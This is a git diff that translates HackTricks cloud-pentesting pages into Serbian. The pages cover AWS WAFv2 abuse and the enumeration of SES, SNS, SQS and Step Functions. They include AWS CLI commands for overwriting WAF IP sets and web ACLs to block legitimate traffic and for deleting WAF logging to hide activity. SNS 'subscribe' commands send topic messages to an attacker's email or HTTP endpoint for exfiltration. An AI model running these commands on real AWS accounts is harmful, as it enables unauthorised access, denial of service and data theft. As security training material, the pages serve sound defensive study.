+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+"DefaultAction": {
+"Allow": {}
+},
+"Description": "",
+"Rules": [
+{
+"Name": "AllowLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Allow": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "AllowLegitimateIPsRule"
+}
+}
+],
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "AllowLegitimateIPsWebACL"
+},
+"Capacity": 1,
+"ManagedByFirewallManager": false,
+"LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:"
+},
+"LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
 }
 ```
-
-Command to update the Web ACL:
-
+Команда за ажурирање Web ACL:
 ```json
 aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1
 ```
-
-The **rule.json** file would look like:
-
+Datoteka **rule.json** bi izgledala ovako:
 ```json
 [
-  {
-    "Name": "BlockLegitimateIPsRule",
-    "Priority": 0,
-    "Statement": {
-      "IPSetReferenceStatement": {
-        "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-      }
-    },
-    "Action": {
-      "Block": {}
-    },
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "BlockLegitimateIPRule"
-    }
-  }
+{
+"Name": "BlockLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Block": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "BlockLegitimateIPRule"
+}
+}
 ]
 ```
-
-**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+**Potencijalni Uticaj**: Neovlašćen pristup, curenje podataka i potencijalni DoS napadi.
 
 #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`**
 
-The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection.
+Dozvola **`wafv2:AssociateWebACL`** bi omogućila napadaču da poveže web ACL-ove (Liste Kontrole Pristupa) sa resursima, što bi omogućilo zaobilaženje bezbednosnih kontrola, dopuštajući neovlašćenoj saobraćaju da dođe do aplikacije, potencijalno dovodeći do eksploatacija poput SQL injekcije ili cross-site scripting (XSS). S druge strane, sa dozvolom **`wafv2:DisassociateWebACL`**, napadač bi mogao privremeno onemogućiti bezbednosne zaštite, izlažući resurse ranjivostima bez otkrivanja.
 
-The additional permissions would be needed depending on the protected resource type:
-
-- **Associate**
-  - apigateway:SetWebACL
-  - apprunner:AssociateWebAcl
-  - appsync:SetWebACL
-  - cognito-idp:AssociateWebACL
-  - ec2:AssociateVerifiedAccessInstanceWebAcl
-  - elasticloadbalancing:SetWebAcl
-- **Disassociate**
-  - apigateway:SetWebACL
-  - apprunner:DisassociateWebAcl
-  - appsync:SetWebACL
-  - cognito-idp:DisassociateWebACL
-  - ec2:DisassociateVerifiedAccessInstanceWebAcl
-  - elasticloadbalancing:SetWebAcl
+Dodatne dozvole bi bile potrebne u zavisnosti od tipa zaštićenog resursa:
 
+- **Poveži**
+- apigateway:SetWebACL
+- apprunner:AssociateWebAcl
+- appsync:SetWebACL
+- cognito-idp:AssociateWebACL
+- ec2:AssociateVerifiedAccessInstanceWebAcl
+- elasticloadbalancing:SetWebAcl
+- **Odvoji**
+- apigateway:SetWebACL
+- apprunner:DisassociateWebAcl
+- appsync:SetWebACL
+- cognito-idp:DisassociateWebACL
+- ec2:DisassociateVerifiedAccessInstanceWebAcl
+- elasticloadbalancing:SetWebAcl
 ```bash
 # Associate
 aws wafv2 associate-web-acl --web-acl-arn  --resource-arn 
 # Disassociate
 aws wafv2 disassociate-web-acl --resource-arn 
 ```
-
-**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF.
+**Potencijalni uticaj**: Kompromitovana sigurnost resursa, povećan rizik od eksploatacije i potencijalni prekidi usluga unutar AWS okruženja zaštićenih AWS WAF-om.
 
 #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`**
 
-An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources.
-
+Napadač bi mogao da kreira, ažurira i obriše IP setove kojima upravlja AWS WAF. Ovo bi moglo biti opasno jer bi mogao da kreira nove IP setove za omogućavanje zlonamernog saobraćaja, modifikuje IP setove kako bi blokirao legitimni saobraćaj, ažurira postojeće IP setove da uključe zlonamerne IP adrese, ukloni pouzdane IP adrese ili obriše kritične IP setove koji su namenjeni zaštiti kritičnih resursa.
 ```bash
 # Create IP set
 aws wafv2 create-ip-set --name  --ip-address-version  --addresses  --scope  | CLOUDFRONT --region=us-east-1>
@@ -389,23 +370,19 @@ aws wafv2 update-ip-set --name  --id  --addresses  --lock-t
 # Delete IP set
 aws wafv2 delete-ip-set --name  --id  --lock-token  --scope  | CLOUDFRONT --region=us-east-1>
 ```
-
-The following example shows how to **overwrite the existing IP set by the desired IP set**:
-
+Sledeći primer pokazuje kako da **prepišete postojeći IP skup željenim IP skupom**:
 ```bash
 aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1
 ```
-
-**Potential Impact**: Unauthorized access and block of legitimate traffic.
+**Potencijalni uticaj**: Neovlašćen pristup i blokiranje legitimnog saobraćaja.
 
 #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`**
 
-An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns.
-
-- Creating new regex patterns would help an attacker to allow harmful content
-- Updating the existing patterns, an attacker would to bypass security rules
-- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures.
+Napadač sa ovim dozvolama mogao bi da manipuliše skupovima obrazaca regularnih izraza koje koristi AWS WAF za kontrolu i filtriranje dolaznog saobraćaja na osnovu specifičnih obrazaca.
 
+- Kreiranje novih regex obrazaca bi pomoglo napadaču da dozvoli štetan sadržaj
+- Ažuriranjem postojećih obrazaca, napadač bi mogao da zaobiđe sigurnosna pravila
+- Brisanje obrazaca koji su dizajnirani da blokiraju zlonamerne aktivnosti moglo bi omogućiti napadaču da pošalje zlonamerne payload-ove i zaobiđe sigurnosne mere.
 ```bash
 # Create regex pattern set
 aws wafv2 create-regex-pattern-set --name  --regular-expression-list  --scope  | CLOUDFRONT --region=us-east-1> [--description ]
@@ -414,62 +391,51 @@ aws wafv2 update-regex-pattern-set --name  --id  --regular-express
 # Delete regex pattern set
 aws wafv2 delete-regex-pattern-set --name  --scope  | CLOUDFRONT --region=us-east-1> --id  --lock-token 
 ```
-
-**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF.
+**Potencijalni uticaj**: Obilaženje bezbednosnih kontrola, omogućavanje zlonamernog sadržaja i potencijalno izlaganje osetljivih podataka ili ometanje usluga i resursa zaštićenih AWS WAF-om.
 
 #### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`**
 
-An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control.
+Napadač sa **`wafv2:DeleteLoggingConfiguration`** mogao bi da ukloni konfiguraciju logovanja iz specificiranog Web ACL-a. Nakon toga, sa **`wavf2:PutLoggingConfiguration`** i **`iam:CreateServiceLinkedRole`** dozvolama, napadač bi mogao da kreira ili zameni konfiguracije logovanja (nakon što ih je obrisao) kako bi ili potpuno sprečio logovanje ili preusmerio logove na neovlašćene destinacije, kao što su Amazon S3 bucket-i, Amazon CloudWatch Logs log grupa ili Amazon Kinesis Data Firehose pod kontrolom.
 
-During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination:
+Tokom procesa kreiranja, servis automatski postavlja potrebne dozvole da omogući pisanje logova na specificiranu destinaciju logovanja:
 
-- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group.
-- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket.
-- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream.
+- **Amazon CloudWatch Logs:** AWS WAF kreira politiku resursa na određenoj CloudWatch Logs log grupi. Ova politika osigurava da AWS WAF ima potrebne dozvole za pisanje logova u log grupu.
+- **Amazon S3 Bucket:** AWS WAF kreira politiku bucket-a na određenom S3 bucket-u. Ova politika dodeljuje AWS WAF-u potrebne dozvole za upload logova u specificirani bucket.
+- **Amazon Kinesis Data Firehose:** AWS WAF kreira ulogu povezanu sa servisom posebno za interakciju sa Kinesis Data Firehose. Ova uloga omogućava AWS WAF-u da isporučuje logove u konfigurisan Firehose stream.
 
 > [!NOTE]
-> It is possible to define only one logging destination per web ACL.
-
+> Moguće je definisati samo jednu destinaciju logovanja po web ACL-u.
 ```bash
 # Put logging configuration
 aws wafv2 put-logging-configuration --logging-configuration 
 # Delete logging configuration
 aws wafv2 delete-logging-configuration --resource-arn  [--log-scope ] [--log-type ]
 ```
-
-**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments.
+**Potencijalni Uticaj:** Zamagljena vidljivost u bezbednosne događaje, otežan proces odgovora na incidente i olakšavanje tajnih zlonamernih aktivnosti unutar AWS WAF-zaštićenih okruženja.
 
 #### **`wafv2:DeleteAPIKey`**
 
-An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource.
-
+Napadač sa ovim dozvolama bi mogao da obriše postojeće API ključeve, čineći CAPTCHA neefikasnim i ometajući funkcionalnost koja se na njemu oslanja, kao što su slanje obrazaca i kontrole pristupa. U zavisnosti od implementacije ovog CAPTCHA, to bi moglo dovesti ili do zaobilaženja CAPTCHA ili do DoS-a ako upravljanje greškama nije pravilno postavljeno u resursu.
 ```bash
 # Delete API key
 aws wafv2 delete-api-key --api-key  --scope  | CLOUDFRONT --region=us-east-1>
 ```
-
-**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft.
+**Potencijalni uticaj**: Onemogućavanje CAPTCHA zaštita ili ometanje funkcionalnosti aplikacije, što može dovesti do bezbednosnih propusta i potencijalne krađe podataka.
 
 #### **`wafv2:TagResource`, `wafv2:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa AWS WAFv2 resursa, kao što su Web ACL-ovi, grupe pravila, IP setovi, regex obrasci i konfiguracije logovanja.
 ```bash
 # Tag
 aws wafv2 tag-resource --resource-arn  --tags 
 # Untag
 aws wafv2 untag-resource --resource-arn  --tag-keys 
 ```
+**Potencijalni uticaj**: Manipulacija resursima, curenje informacija, manipulacija troškovima i operativna prekid.
 
-**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption.
-
-## References
+## Reference
 
 - [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
index bc6af90f1..d4843b0fc 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md
@@ -2,45 +2,40 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes.
+Amazon Simple Email Service (Amazon SES) je dizajniran za **slanje i primanje emailova**. Omogućava korisnicima da efikasno i sigurno šalju transakcione, marketinške ili obaveštajne emailove u velikim količinama. **Dobro se integriše sa drugim AWS uslugama**, pružajući robusno rešenje za upravljanje email komunikacijom za preduzeća svih veličina.
 
-You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails).
+Potrebno je registrovati **identitete**, koji mogu biti domeni ili email adrese koje će moći da komuniciraju sa SES (npr. šalju i primaju emailove).
 
-### SMTP User
-
-It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as:
+### SMTP korisnik
 
+Moguće je povezati se na **SMTP server AWS-a da bi se izvršile radnje** umesto korišćenja AWS API-ja (ili pored njega). Za to je potrebno kreirati korisnika sa politikom kao što je:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": "ses:SendRawEmail",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "ses:SendRawEmail",
+"Resource": "*"
+}
+]
 }
 ```
-
-Then, gather the **API key and secret** of the user and run:
-
+Zatim, prikupite **API ključ i tajnu** korisnika i pokrenite:
 ```bash
 git clone https://github.com/lisenet/ses-smtp-converter.git
 cd ./ses-smtp-converter
 chmod u+x ./ses-smtp-conv.sh
 ./ses-smtp-conv.sh  
 ```
-
-It's also possible to do this from the AWS console web.
+Takođe je moguće to uraditi iz AWS konzole na vebu.
 
 ### Enumeration
 
 > [!WARNING]
-> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two.
-
+> Imajte na umu da SES ima 2 API-ja: **`ses`** i **`sesv2`**. Neke akcije su u oba API-ja, a druge su samo u jednom od ta dva.
 ```bash
 # Get info about the SES account
 aws sesv2 get-account
@@ -117,7 +112,6 @@ aws ses get-send-quota
 ## Get statistics
 aws ses get-send-statistics
 ```
-
 ### Post Exploitation
 
 {{#ref}}
@@ -125,7 +119,3 @@ aws ses get-send-statistics
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
index cca4353cb..c94641f8a 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
@@ -4,18 +4,17 @@
 
 ## SNS
 
-Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types.
+Amazon Simple Notification Service (Amazon SNS) se opisuje kao **potpuno upravljana usluga za razmenu poruka**. Podržava i **komunikacione tipove između aplikacija** (A2A) i **komunikacione tipove između aplikacije i osobe** (A2P).
 
-Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern.
+Ključne karakteristike za A2A komunikaciju uključuju **mehanizme objavljivanja/pretplate (pub/sub)**. Ovi mehanizmi uvode **teme**, koje su ključne za omogućavanje visoke propusnosti, **push-bazirane, mnoge-na-mnoge razmene poruka**. Ova funkcija je veoma korisna u scenarijima koji uključuju distribuirane sisteme, mikroservise i arhitekture bez servera zasnovane na događajima. Korišćenjem ovih tema, sistemi za objavljivanje mogu efikasno distribuirati poruke širokom spektru sistema za pretplatu, olakšavajući obrazac razmene poruka.
 
-### **Difference with SQS**
+### **Razlika sa SQS**
 
-**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\
-On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\
-While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.
-
-### **Enumeration**
+**SQS** je **usluga zasnovana na redovima** koja omogućava komunikaciju tačka-tačka, osiguravajući da poruke obrađuje **jedan potrošač**. Nudi **isporuku najmanje jednom**, podržava standardne i FIFO redove, i omogućava zadržavanje poruka za ponovne pokušaje i odloženu obradu.\
+S druge strane, **SNS** je **usluga zasnovana na objavljivanju/pretplati**, koja omogućava **jedan-na-mnoge** komunikaciju emitovanjem poruka **više pretplatnika** istovremeno. Podržava **različite tačke pretplate kao što su email, SMS, Lambda funkcije i HTTP/HTTPS**, i pruža mehanizme filtriranja za ciljanje isporuke poruka.\
+Dok obe usluge omogućavaju odvajanje između komponenti u distribuiranim sistemima, SQS se fokusira na komunikaciju putem redova, dok SNS naglašava komunikacione obrasce zasnovane na događajima i širenju. 
 
+### **Enumeracija**
 ```bash
 # Get topics & subscriptions
 aws sns list-topics
@@ -24,60 +23,55 @@ aws sns list-subscriptions-by-topic --topic-arn 
 
 # Check privescs & post-exploitation
 aws sns publish --region  \
-    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
-    --message file://message.txt
+--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
+--message file://message.txt
 
 # Exfiltrate through email
 ## You will receive an email to confirm the subscription
 aws sns subscribe --region  \
-    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
-    --protocol email \
-    --notification-endpoint my-email@example.com
+--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
+--protocol email \
+--notification-endpoint my-email@example.com
 
 # Exfiltrate through web server
 ## You will receive an initial request with a URL in the field "SubscribeURL"
 ## that you need to access to confirm the subscription
 aws sns subscribe --region \
-    --protocol http \
-    --notification-endpoint http:/// \
-    --topic-arn 
+--protocol http \
+--notification-endpoint http:/// \
+--topic-arn 
 ```
-
 > [!CAUTION]
-> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used).
+> Imajte na umu da ako je **tema tipa FIFO**, mogu se koristiti samo pretplatnici koji koriste protokol **SQS** (HTTP ili HTTPS ne mogu se koristiti).
 >
-> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+> Takođe, čak i ako `--topic-arn` sadrži region, obavezno navedite tačan region u **`--region`** ili ćete dobiti grešku koja izgleda kao da nemate pristup, ali je problem u regionu.
 
-#### Unauthenticated Access
+#### Neautorizovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
 {{#endref}}
 
-#### Privilege Escalation
+#### Eskalacija Privilegija
 
 {{#ref}}
 ../aws-privilege-escalation/aws-sns-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+#### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-sns-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+#### Postojanost
 
 {{#ref}}
 ../aws-persistence/aws-sns-persistence.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
index 1da888587..3010de373 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
@@ -4,10 +4,9 @@
 
 ## SQS
 
-Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work.
+Amazon Simple Queue Service (SQS) se predstavlja kao **potpuno upravljana usluga za redove poruka**. Njegova glavna funkcija je da pomogne u skaliranju i odvojenju mikroservisa, distribuiranih sistema i serverless aplikacija. Usluga je dizajnirana da ukloni potrebu za upravljanjem i radom sa middleware-om orijentisanim na poruke, što može često biti složeno i resursno intenzivno. Ova eliminacija složenosti omogućava programerima da usmere svoje napore ka inovativnijim i diferenciranim aspektima svog rada.
 
 ### Enumeration
-
 ```bash
 # Get queues info
 aws sqs list-queues
@@ -18,40 +17,35 @@ aws sqs receive-message --queue-url 
 
 aws sqs send-message --queue-url  --message-body 
 ```
-
 > [!CAUTION]
-> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+> Takođe, čak i ako `--queue-url` sadrži region, obavezno navedite tačan region u **`--region`** ili ćete dobiti grešku koja izgleda kao da nemate pristup, ali je problem u regionu.
 
-#### Unauthenticated Access
+#### Neautorizovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
 {{#endref}}
 
-#### Privilege Escalation
+#### Eskalacija Privilegija
 
 {{#ref}}
 ../aws-privilege-escalation/aws-sqs-privesc.md
 {{#endref}}
 
-#### Post Exploitation
+#### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-sqs-post-exploitation.md
 {{#endref}}
 
-#### Persistence
+#### Postojanost
 
 {{#ref}}
 ../aws-persistence/aws-sqs-persistence.md
 {{#endref}}
 
-## References
+## Reference
 
 - https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
index 873629bba..4697b6891 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
@@ -4,266 +4,253 @@
 
 ## Step Functions
 
-AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL).
+AWS Step Functions je servis za radne tokove koji vam omogućava da koordinirate i orkestrirate više AWS servisa u serverless radne tokove. Korišćenjem AWS Step Functions, možete dizajnirati i pokretati radne tokove koji povezuju različite AWS servise kao što su AWS Lambda, Amazon S3, Amazon DynamoDB i mnoge druge, u nizu koraka. Ova orkestracija pruža vizuelni interfejs za radne tokove i nudi **state machine** mogućnosti, omogućavajući vam da definišete svaki korak radnog toka na deklarativan način koristeći JSON-bazirani **Amazon States Language** (ASL).
 
-## Key concepts
+## Ključni koncepti
 
-### Standard vs. Express Workflows
+### Standardni vs. Express Radni Tokovi
 
-AWS Step Functions offers two types of **state machine workflows**: Standard and Express.
+AWS Step Functions nudi dva tipa **state machine workflows**: Standardni i Express.
 
-- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year.
-- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage.
+- **Standardni Radni Tok**: Ova podrazumevana vrsta radnog toka je dizajnirana za dugotrajne, trajne i auditable procese. Podržava **exactly-once execution**, osiguravajući da se zadaci izvršavaju samo jednom osim ako nisu navedeni ponovni pokušaji. Idealna je za radne tokove koji zahtevaju detaljnu istoriju izvršenja i može trajati do jedne godine.
+- **Express Radni Tok**: Ova vrsta je idealna za zadatke visokog obima i kratkog trajanja, koji traju do pet minuta. Podržavaju **at-least-once execution**, pogodna za idempotentne zadatke kao što je obrada podataka. Ovi radni tokovi su optimizovani za troškove i performanse, naplaćujući se na osnovu izvršenja, trajanja i korišćenja memorije.
 
-### States
+### Stanja
 
-States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type:
+Stanja su osnovne jedinice state mašina. Ona definišu pojedinačne korake unutar radnog toka, mogući su da izvršavaju razne funkcije u zavisnosti od tipa:
 
-- **Task:** Executes a job, often using an AWS service like Lambda.
-- **Choice:** Makes decisions based on input.
-- **Fail/Succeed:** Ends the execution with a failure or success.
-- **Pass:** Passes input to output or injects data.
-- **Wait:** Delays execution for a set time.
-- **Parallel:** Initiates parallel branches.
-- **Map:** Dynamically iterates steps over items.
+- **Task:** Izvršava posao, često koristeći AWS servis kao što je Lambda.
+- **Choice:** Donosi odluke na osnovu ulaza.
+- **Fail/Succeed:** Završava izvršenje neuspehom ili uspehom.
+- **Pass:** Prosleđuje ulaz na izlaz ili ubacuje podatke.
+- **Wait:** Odlaže izvršenje na određeno vreme.
+- **Parallel:** Pokreće paralelne grane.
+- **Map:** Dinamički iterira korake preko stavki.
 
 ### Task
 
-A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs.
+**Task** stanje predstavlja jednu jedinicu posla koju izvršava state mašina. Zadaci mogu pozivati različite resurse, uključujući aktivnosti, Lambda funkcije, AWS servise ili API-je trećih strana.
 
-- **Activities**: Custom workers you manage, suitable for long-running processes.
-  - Resource: **`arn:aws:states:region:account:activity:name`**.
-- **Lambda Functions**: Executes AWS Lambda functions.
-  - Resource: **`arn:aws:lambda:region:account:function:function-name`**.
-- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3.
-  - Resource: **`arn:partition:states:region:account:servicename:APIname`**.
-- **HTTP Task**: Calls third-party APIs.
-  - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details.
-
-The following example shows a Task state definition that invokes a Lambda function called HelloWorld:
+- **Aktivnosti**: Prilagođeni radnici koje upravljate, pogodni za dugotrajne procese.
+- Resurs: **`arn:aws:states:region:account:activity:name`**.
+- **Lambda Funkcije**: Izvršava AWS Lambda funkcije.
+- Resurs: **`arn:aws:lambda:region:account:function:function-name`**.
+- **AWS Servisi**: Integrira se direktno sa drugim AWS servisima, kao što su DynamoDB ili S3.
+- Resurs: **`arn:partition:states:region:account:servicename:APIname`**.
+- **HTTP Task**: Poziva API-je trećih strana.
+- Polje resursa: **`arn:aws:states:::http:invoke`**. Zatim, trebate navesti detalje konfiguracije API krajnje tačke, kao što su API URL, metoda i detalji autentifikacije.
 
+Sledeći primer prikazuje definiciju Task stanja koja poziva Lambda funkciju pod nazivom HelloWorld:
 ```json
 "HelloWorld": {
-  "Type": "Task",
